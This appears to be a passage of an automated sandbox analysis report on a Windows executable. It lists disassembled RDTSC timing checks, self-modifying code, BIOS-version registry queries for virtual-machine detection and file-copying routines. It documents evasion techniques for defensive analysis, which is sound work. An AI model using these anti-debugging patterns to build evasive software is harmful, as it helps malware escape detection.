              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988E30 second address: 988E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE26h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988E53 second address: 988E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007FE52CC95245h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E7E6 second address: 98E7F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE52CBFFE1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995FC4 second address: 995FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995FC8 second address: 995FCE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995FCE second address: 995FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jl 00007FE52CC95236h 0x0000000d pop edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995FDC second address: 995FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CBFFE1Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995FEE second address: 995FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995FF2 second address: 996000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E337 second address: 99E359 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE52CC95240h 0x00000011 jg 00007FE52CC95236h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E359 second address: 99E378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE1Ah 0x0000000b jnc 00007FE52CBFFE18h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E378 second address: 99E38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007FE52CC95236h 0x0000000e pop edi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D114 second address: 99D11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D11A second address: 99D12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FE52CC95236h 0x0000000c jno 00007FE52CC95236h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D12E second address: 99D16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FE52CBFFE28h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE52CBFFE23h 0x00000013 push edx 0x00000014 ja 00007FE52CBFFE16h 0x0000001a jne 00007FE52CBFFE16h 0x00000020 pop edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D16F second address: 99D174 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D400 second address: 99D40A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE52CBFFE16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D40A second address: 99D430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jne 00007FE52CC95236h 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jg 00007FE52CC9525Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D430 second address: 99D434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D434 second address: 99D438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D438 second address: 99D442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D442 second address: 99D446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A20F0 second address: 9A210B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE27h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A210B second address: 9A212D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FE52CC95236h 0x0000000d jno 00007FE52CC95236h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jo 00007FE52CC95248h 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A212D second address: 9A2131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4EF6 second address: 9A4F12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95248h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4F12 second address: 9A4F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE23h 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FE52CBFFE16h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4F33 second address: 9A4F4F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007FE52CC9523Ah 0x00000013 pop edi 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4F4F second address: 9A4F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4B0F second address: 9A4B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4C0E second address: 9B4C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE1Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FE52CBFFE21h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4C37 second address: 9B4C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF61F second address: 9AF630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF630 second address: 9AF634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1481 second address: 9C1486 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0F40 second address: 9C0F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0F48 second address: 9C0F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0F55 second address: 9C0F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FE52CC9523Bh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C10E9 second address: 9C10ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7D18 second address: 9D7D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6EA9 second address: 9D6EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6EAE second address: 9D6EB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6FF5 second address: 9D6FFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6FFF second address: 9D7003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7003 second address: 9D7007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7007 second address: 9D7019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FE52CC95236h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7019 second address: 9D703D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE29h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D75A0 second address: 9D75A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7715 second address: 9D771B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7887 second address: 9D788D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D788D second address: 9D78AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE26h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A6CF4 second address: 8A6CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D79EB second address: 9D7A03 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE52CBFFE22h 0x00000008 je 00007FE52CBFFE16h 0x0000000e jnp 00007FE52CBFFE16h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7A03 second address: 9D7A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D93C9 second address: 9D93CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D93CD second address: 9D93FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE52CC95236h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FE52CC9524Bh 0x00000012 pop edx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBCEF second address: 9DBD10 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE52CBFFE26h 0x00000008 jmp 00007FE52CBFFE20h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBD10 second address: 9DBD14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBD14 second address: 9DBD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF82 second address: 9DBF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FE52CC95236h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF93 second address: 9DBF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF97 second address: 9DBF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBF9D second address: 9DBFA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FE52CBFFE16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC274 second address: 9DC279 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC279 second address: 9DC2CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FE52CBFFE18h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 movzx edx, bx 0x00000027 jmp 00007FE52CBFFE20h 0x0000002c push dword ptr [ebp+122D2702h] 0x00000032 mov edx, dword ptr [ebp+122D2F18h] 0x00000038 push 9B0B5D0Eh 0x0000003d pushad 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC2CF second address: 9DC2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDB4B second address: 9DDB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDB51 second address: 9DDB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FE52CC95236h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDB61 second address: 9DDB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE28h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDB81 second address: 9DDB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE52CC95236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF714 second address: 9DF720 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007FE52CBFFE16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF720 second address: 9DF738 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE52CC95240h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502AA second address: 50502AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502AE second address: 50502B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502B4 second address: 5050300 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 jmp 00007FE52CBFFE21h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FE52CBFFE1Ch 0x00000015 sub cx, E468h 0x0000001a jmp 00007FE52CBFFE1Bh 0x0000001f popfd 0x00000020 push ecx 0x00000021 mov dl, 31h 0x00000023 pop eax 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 pushad 0x00000029 mov bh, 07h 0x0000002b mov cl, 5Bh 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov si, dx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050300 second address: 5050318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 movsx edx, cx 0x0000000c call 00007FE52CC9523Ah 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050373 second address: 5050379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 73FCA4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 73FD6C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 97C77D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-26889
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005018A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005018A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00503910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00503910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00501250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00501250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00501269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00501269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0050E210
